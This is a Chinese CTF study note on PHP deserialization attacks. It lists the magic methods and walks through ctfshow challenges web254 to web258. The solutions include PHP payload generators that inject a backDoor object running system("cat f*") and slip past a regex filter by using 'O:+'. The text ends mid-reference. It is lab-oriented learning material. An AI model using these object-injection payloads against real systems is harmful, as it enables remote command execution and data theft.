简介
php序列化和反序列用到两个函数
序列化:serialize,将对象格式化为一个新的字符串
反序列化:unserialize,将字符串还原为原来的对象。
一般在CTF中,可以通过自己写php代码,并传序列化后的代码,可以覆盖原来的代码,从而改变代码执行过程,达到自己的目的(仅限我的理解)
入门
参考:
https://blog.csdn.net/solitudi/article/details/113588692?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163090819616780357263384%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=163090819616780357263384&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_v2~rank_v29-1-113588692.pc_v2_rank_blog_default&utm_term=php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96&spm=1018.2226.3001.4450
https://blog.csdn.net/q20010619/article/details/108352029?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163093042316780271566242%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=163093042316780271566242&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_v2~rank_v29-3-108352029.pc_search_result_hbase_insert&utm_term=php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96&spm=1018.2226.3001.4187
反序列化中常见的魔法函数
__construct 当一个对象创建时被调用
__destruct 当一个对象销毁时被调用
__wakeup() //执行unserialize()时,先会调用这个函数
__sleep() //执行serialize()时,先会调用这个函数
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当尝试将对象调用为函数时触发
web254
感觉和反序列化没有关系,直接通过URL参数传入,username=xxxxxx&password=xxxxxx
web255
看代码得知,url传参数?username=xxxxxx&password=xxxxxx 并且使得属性isVip=true,才可以得到flag 所以使用unserialize,改变原来代码的isVip属性值
<?php
class ctfShowUser{
public $isVip=true;
}
echo serialize(new ctfShowUser);
然后用得到的字符串,写进cookie中
web256
看代码,需要满足username和password不相同 使用unserialize去构造字符串,使两者不同
<?php
class ctfShowUser{
public $isVip=true;
public $username='a';
}
echo serialize(new ctfShowUser);
web257
看代码,跟前面几个题不相同了,需要你通过eval的命令执行来得到flag ctfShowUser类中的__construct()和__destruct(),可以执行其他类的代码
<?php
class ctfShowUser{
private $class;
public function __construct(){
$this->class=new backDoor();
}
}
class backDoor{
private $code='system("cat f*");';
}
$b=new ctfShowUser();
echo urlencode(serialize($b));
web258
绕过正则,在O:后面加一个+来绕过正则,且把private改成public
<?php
class ctfShowUser{
public $class;
public function __construct(){
$this->class=new backDoor();
}
}
class backDoor{
public $code='system("cat f*");';
}
$a=new ctfShowUser();
$b=serialize($a);
$b=str_replace('O:','O:+',$b);
echo urlencode($b);
为什么需要用urlencode?
原因就是属性的修饰词不同,在反序列化中,private和protected都有例外 private:序列化后变量前\x00类名\x00 protected:序列化后变量前\x00*\x00
<?php
class xctf{
private $flag = '111';
public $a='222';
protected $b='333';
public function __wakeup(){
exit('bad requests');
}
}
$a=new xctf();
echo serialize($a.PHP_EOL);
?>
输出
O:4:"xctf":3:{s:10:"xctfflag";s:3:"111";s:1:"a";s:3:"222";s:4:"*b";s:3:"333";}
这样序列化后,出现了不可见字符 所以一般需要urlcode编码,当然在本地存储耿采用base64编码
补充知识点
php中输出打印的方式
echo ,有无括号都可以,输出字符串
print,可以打印字符串
printf,类似于C语言了,%s: 按字符串;
%d: 按整型;
%b: 按二进制;
%x: 按16进制;
%o: 按八进制;
$f: 按浮点型
print_r,专门用来输出数组类型
var_dump,可以输出字符串和数组,用来调试
die,停止下面的程序执行,并输出一定的内容
参考:
https:
|